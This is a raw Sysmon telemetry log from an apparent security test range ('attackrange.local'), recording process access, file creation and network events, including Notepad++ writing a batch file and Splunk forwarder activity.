Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\System32\SHELL32.dll+83770|C:\Windows\System32\SHELL32.dll+8369d|C:\Windows\system32\explorerframe.dll+29e56|C:\Windows\system32\explorerframe.dll+c7e6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\USER32.dll+148bf|C:\Windows\System32\USER32.dll+2e967|C:\Windows\System32\USER32.dll+2e813|C:\Windows\System32\USER32.dll+2e6b2|C:\Windows\System32\USER32.dll+2e648|C:\Windows\System32\COMDLG32.dll+13ae4 10341000x80000000000000001046521Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:39.021{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\System32\SHELL32.dll+83770|C:\Windows\System32\SHELL32.dll+8369d|C:\Windows\system32\explorerframe.dll+29e56|C:\Windows\system32\explorerframe.dll+c7e6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\USER32.dll+148bf|C:\Windows\System32\USER32.dll+2e967|C:\Windows\System32\USER32.dll+2e813|C:\Windows\System32\USER32.dll+2e6b2|C:\Windows\System32\USER32.dll+2e648|C:\Windows\System32\COMDLG32.dll+13ae4|C:\Program Files\Notepad++\notepad++.exe+169a0f 23542300x80000000000000001046531Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:40.803{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6E06CC378627DFD24846668A1E5B85A,SHA256=AC322519E52F5F281E9A64EC19F5CB38EBB42BF9843CBF7780370C97B66D8D27,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806368Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:40.053{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A4D00F8E7640EFF11CE961E5B1BB679,SHA256=BBE12AEE72D73F330987AC1A6E295C6F8E9F5DD5CA415C936E1CD50D32A1AC9A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046530Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:32.240{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local50929-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local49666- 354300x80000000000000001046529Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:32.240{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local50929-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local49666- 354300x80000000000000001046528Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:32.239{466BC892-02AF-60E8-0D00-00000000CF01}900C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local50928-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local135epmap 354300x80000000000000001046527Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:32.239{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local50928-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local135epmap 23542300x80000000000000001046532Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:41.818{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5AED93FB9566E12DED81DFDBB12507DA,SHA256=3E04773DCB04C4149664C1D63061FA913190136D8AE0CE771CD80EFB37ACAAF3,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806370Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:40.296{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57174-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806369Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:41.081{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=95820C18C067AB2F8E699875BC7CBF3C,SHA256=8CA745B3A159CB9D7A706F58DB45B39EA789E07EE4BD15D4345FD2DF45E132A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046540Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:42.836{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD6F177FCE6B56166E4A5424B781278C,SHA256=827704982673C96AB29FBA87C54D87F40CFBBC89E8BC22BBF3F0D28ABEEF2E51,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806371Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:42.099{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2AA9CA2C29974B01D8125402C7B839E3,SHA256=C9E2013B36FE1679772574681790C17F0742876FFC27DFD798BBE5EA757C6BB9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046539Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:42.539{466BC892-35E4-60E8-4B0C-00000000CF01}7336ATTACKRANGE\bobC:\Program Files\Notepad++\notepad++.exeC:\Users\bob\AppData\Roaming\Notepad++\backup\new 1@2021-07-12_074537MD5=615C8F3EB8FC071E532A0252BEBCCC80,SHA256=CB8F4133557FB2EFB91D2A3DF7ECD71AD31D41E1F1B3F0C8BC7A996A68578352,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001046538Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:42.517{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exeC:\Temp\test\ws.bat2021-07-12 07:45:42.455 10341000x80000000000000001046537Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:42.470{466BC892-32D3-60E8-770B-00000000CF01}63565464C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046536Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:42.470{466BC892-32D3-60E8-770B-00000000CF01}63565464C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046535Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:42.470{466BC892-32D3-60E8-770B-00000000CF01}63565464C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001046534Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:42.455{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exeC:\Temp\test\ws.bat2021-07-12 07:45:42.455 354300x80000000000000001046533Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:33.711{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50930-false10.0.1.12-8000- 23542300x80000000000000001046545Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:43.869{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=648EF49334BDE26E8F7145BC2CF3C36A,SHA256=4E19C9EF27A2E3BBF844B4DA15F22D82940D9275C6D3D90FF2420B45DAE72ADC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806372Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:43.115{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B30AEC1887439C059DB7C88956EC75A,SHA256=AF364E7D9F6BB918EC908000E1C763A651AEDF33C435B773F73835A3307394A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046544Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:43.753{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EAC9D93D5FD6D082CB55C8826AB0AF84,SHA256=45E8F5F835C940D9E65CF94B094786EB923D4A56AF34FE9B77B5AFC8922F6321,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046543Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:43.753{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=27511018F65BD42D749DE47C5DF279E9,SHA256=766B4180F5E9E26BF3E63F7A95B7D65A4E1B597B09EA58647464C55703D834A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046542Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:43.669{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=B3D5AE835858E906D1E72577C6F345D4,SHA256=81B9B52F606582EF0BAB76BDDEAC11B5A054E348BD2107479BC5BBEF4E1E03B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046541Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:43.669{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=36293ADF60D97F3305FBC7893C4C418D,SHA256=6AADAF298C86C4A08FDEB75C17B60E913DD726AA7C35BA04F1ADDF92BA474E3F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046546Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:44.883{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FCF7D916ECCCFD05234EF2D93B388F86,SHA256=0174F1A544C63B99CAC4501D0007299CC5B111E44A490AAC2B9D5870F6E57BF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806373Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:44.115{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D47E9E8C544CACC9B489F5A2FC392D1,SHA256=23F99903A05957766AD71CD1ED1AF83F2437D068B43E49B26B9965C803C8B2FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046547Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:45.898{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB42A3D0EA6B56C1FD56EC76F926EC4C,SHA256=52AC6B4041EEAB68F74FEA5180CB15FFBCED75125D541CA272F54B851CAB3A4C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806374Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:45.193{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E052C05645F42007A8850B510CF2342,SHA256=9C915EBE460EE5BDEC140A8653CA101AD59575C6153997611EA679F68EDDCBAE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046548Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:46.913{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94017F655C88E0FA40104018B2082212,SHA256=2EB06AA616058015378A5C71610CC5DCEA2BA541D5BC561E4EB31F4B45EBAE28,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806375Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:46.193{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A0BD1019A5B68724668E1B923D63FBC,SHA256=1DE46BB39BEA116D4DC6D59C953D06C759446255D7D7FCA03CAEDED3D34CD9FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046549Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:47.930{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=05A67F11890E328D21E50790C5E18560,SHA256=DCC101D42E9A142B07D5BF0B24541DB8999C21FD27AA942F072F35FE57930A31,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806377Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:46.217{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57175-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806376Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:47.256{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E9879F70294C66A1C1D522145D89EDD9,SHA256=AD10DA8C090DC5BF660F6D607A2F1E1E5327D475132F0A1F7321ACC081D8EAEB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046551Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:48.949{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=28885835749EBB735D8211DD0F940853,SHA256=AEBB82B5759555A3A54F0963CE4D43FD786A36A2CDCF6DEAA603779B7C0465DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806378Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:48.271{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=843488F4D819C55E9010514DADC9D893,SHA256=2D0DEEFEC8291D3D0DCFC3626D9B3152669BB6C35FE0736E05772249E30138E2,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046550Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:39.637{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50931-false10.0.1.12-8000- 23542300x80000000000000001046552Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:49.963{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E975B527C41E159515CD98001474CE94,SHA256=3DD5C1944DC9EA09C492C654A90E02D4BDCB3841CDB68AC3BB0E4FFE64415FD2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806381Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:49.349{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FB2E255D74A76241598EAF3067116344,SHA256=03620E4F0E7B6ED300D5E9B7C13EC74A2EB5F354492B5531AF9C1B17406449A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806380Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:49.349{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B6DFE2A6D6CBE03F3ECB7FFD7408FD9D,SHA256=32F3437E6DA661EF3BB7B3BD5C58F2784084AE95673B585C807C5139C16FE953,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806379Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:49.302{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=98040088159668A179D3F03219820C03,SHA256=31B3B3146A2A1ACECEF231CCB2522A1603B0BC9BBF337F72B8AAB2FD081F4573,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046570Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:50.978{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EAEB9CCF1F4ECE2158FDA3663C02B3DB,SHA256=12738B05FA934B819AAB5CF0AA27C2673BC6672B66D871D4EDA2E1AB3A48CC5F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806384Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:50.334{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E3AB3C041E005FD9B38623AE67783D5,SHA256=C99C14F5FA4928946D6A9A47992942173CB8DD6043B663ABAFAF1E47687BFACB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046569Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:50.879{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F32E-60EB-F87C-00000000CF01}9000C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046568Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:50.879{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046567Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:50.879{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 